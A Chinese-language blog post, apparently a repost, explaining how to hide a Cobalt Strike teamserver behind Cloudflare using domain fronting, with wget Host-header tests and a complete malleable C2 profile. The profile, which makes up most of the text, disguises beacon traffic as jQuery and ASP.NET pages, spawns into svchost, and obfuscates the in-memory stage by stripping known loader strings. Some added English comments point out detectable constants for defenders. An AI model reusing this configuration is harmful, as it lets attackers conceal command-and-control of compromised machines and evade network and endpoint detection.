cs配置cdn实现域名上线


前期准备

  • 国外VPS,用于放置 teamserver
  • 谷歌邮箱账号
  • cloudflare.com/ 免费cdn
  • cobalt strike

将cdn绑定teamserver的ip,之后,启动teamserver +profile

域前置原理

正常情况下
在cs上上传个HTML文件
用wget下载访问

wget -U demo -q -O - http://target.com/index.html
hello world!!!
访问返回结果
如果出现 522(Cloudflare 边缘节点无法连接到源站)代表 cdn 未生效
利用header头让cdn跳转到指定的服务器
wget -U demo -q -O - http://arya.ns.cloudflare.com/index.html --header "Host: target.com"
访问下载,返回结果
hello world!!!

我们可以通过修改cs的配置文件,强制让cdn跳转到我们指定的域名
cs的配置文件原理

1.png

1.png

请求过程

  1. 首先由客户端发起请求经过cdn,之后通过header跳转到我们指定的域名

    (需要在http-get中添加header头,还有在http-post中添加header头,这样使get和post都按照设置好的规则去走流量)
  2. server端接收到get数据,并按照设置的header头,去跳转到我们的服务器
  3. 由server持续通信,需要用到分段传输,(重要)(http-stager这个规则主要是为了上线来设定,需要在上面添加header头,重定向到我们的服务)

之后完成的c2的配置文件

cdn.profile

#
# Amazon browsing traffic profile
# 
# Author: @harmj0y
#

# Listener TLS certificate material. The subject fields imitate jquery.com, but the
# certificate comes from a local keystore, so it is presumably self-signed (TODO confirm).
# The note at the end of the article says only http is used, so this block may be inert here.
https-certificate {
    set keystore "./cobaltstrike.store";
    set password "123456";
    set L   "Mountain View";
    set C   "US";
    set ST  "CA";
    set CN  "jquery.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}
# SpawnTo: pick a binary of the matching bitness that does not require UAC elevation,
# preferably one that normally communicates over the network as well
# No suitable x64 binary was found here (it would not start), so the default rundll32.exe is kept
#set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
#set spawnto_x64 "%windir%\\System32\\spoolsv.exe -k netsvcs";
# Defender note: svchost.exe whose parent is anything other than services.exe is a
# commonly flagged post-exploitation indicator.
post-ex{

     set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
}

# Staging
set host_stage "true"; # hosts that check in over http, https or DNS will use stagers

# Beacon cadence: 5000 ms sleep with 35% jitter. Check-ins this short and regular
# remain visible as periodic traffic in proxy/flow logs even when fronted by a CDN.
set sleeptime "5000";
set jitter    "35";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";



# Beacon check-in (GET) channel. Host/Referer carry the fronted domain that the CDN
# edge routes on (see the wget example earlier in the article).
# Defender note: the Cookie value and the relativeUrl/v/s parameters below are literal
# constants, so every beacon built from this profile sends identical values — a stable
# network signature.
http-get {

    set uri "/Sample/DownloadFile";

    client {
        
        # NOTE(review): this header value spans a line break as the page shows it;
        # presumably a formatting artifact of the page rather than of the original profile.
        header "Host" "cdn.target.com
";
        header "Cookie" "ASP.NET_SessionId=zywxteesnq4eryyslpnestmn";   
        header "Referer" "https://cdn.target.com
";

        metadata {
            base64url;
            parameter "fileName";
        }
        parameter "relativeUrl" "/Scripts/jquery.min.js";
        parameter "v" "js";
        parameter "s" "0.4456841254";
        
    }

    server {

        
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";

        # Tasking is netbios-encoded and wrapped in a static HTML "error" page; the same
        # wrapper text is reused in the http-post and http-stager server blocks.
        output {
           netbios;  
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

# Beacon output (post) channel. Note `set verb "GET"`: results leave as GET requests,
# base64url-encoded in the fileName parameter, not as an HTTP POST body.
# Defender note: the s parameter repeats the same constant used in http-get.
http-post {
    
     set uri "/Sample/UploadFile";
     set verb "GET";

    client {
        
        header "Host" "cdn.target.com
";
        header "Accept" "*/*";
        header "Content-Type" "multipart/form-data";
        header "Referer" "https://cdn.target.com
";
        

        output {
            base64url;
            parameter "fileName";
        }
        parameter "relativeUrl" "/upload/";
        parameter "s" "0.4456841254";
        # Session id travels in the v parameter (http-get uses v for a fixed "js").
        id {
           base64url;
           parameter "v";
          }
        
    }

    server {

        
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";

        # Same static HTML wrapper and netbios encoding as the http-get server block.
        output {
           netbios;  
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

# In-memory indicators: how the reflective DLL stage presents itself once loaded.
stage {
    set userwx "false"; 
    set stomppe "true";
    set obfuscate "true";
    set name "srv.dll";
    set cleanup "true";

    # Values captured using peclone against a Windows 10 version of explorer.exe
    set checksum "0";
 #set compile_time "18 Sep 2013 06:49:18";
 set entry_point "650688";
 set image_size_x86 "4661248";
 set image_size_x64 "4661248";
 set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    # CS 3.12 "Obfuscate and Sleep" for HTTP Beacons

    set sleep_mask "true";
    # The replacements below alter well-known loader strings; the 9-byte 0x90 prefix and
    # the added "jQuery" string are themselves constants shared by everything built from
    # this profile.
    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend NOP (0x90) bytes — not nulls, despite the original wording
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll" ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend NOP (0x90) bytes — not nulls, despite the original wording
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll" ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

# Stager download channel (initial payload retrieval; the request-flow notes above explain
# why this block also needs the Host header).
http-stager {
 
 client {
        
        header "Host" "cdn.target.com
";
        header "Accept-Encoding" "gzip, deflate";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Referer" "https://cdn.target.com
";
   }
    server {
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";
        # Defender note: the Server value is set by the profile, not by a real IIS; any
        # headers the fronting CDN edge adds on its own are not controlled here and may
        # not match this claim (TODO confirm against captured traffic).
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";

        # Same static HTML wrapper as the http-get/http-post server blocks, without netbios.
        output {
           
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

注意只能使用http

参考

cdn上线

https://0x20h.com/p/8dee.html

https://www.chainnews.com/articles/348984046030.htm

https://evi1cg.me/archives/Domain_Fronting.html

https://www.anquanke.com/post/id/210848

https://xz.aliyun.com/t/2796

  • 本文由 发表于 2021年11月30日19:53:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cs配置cdn实现域名上线http://cn-sec.com/archives/654925.html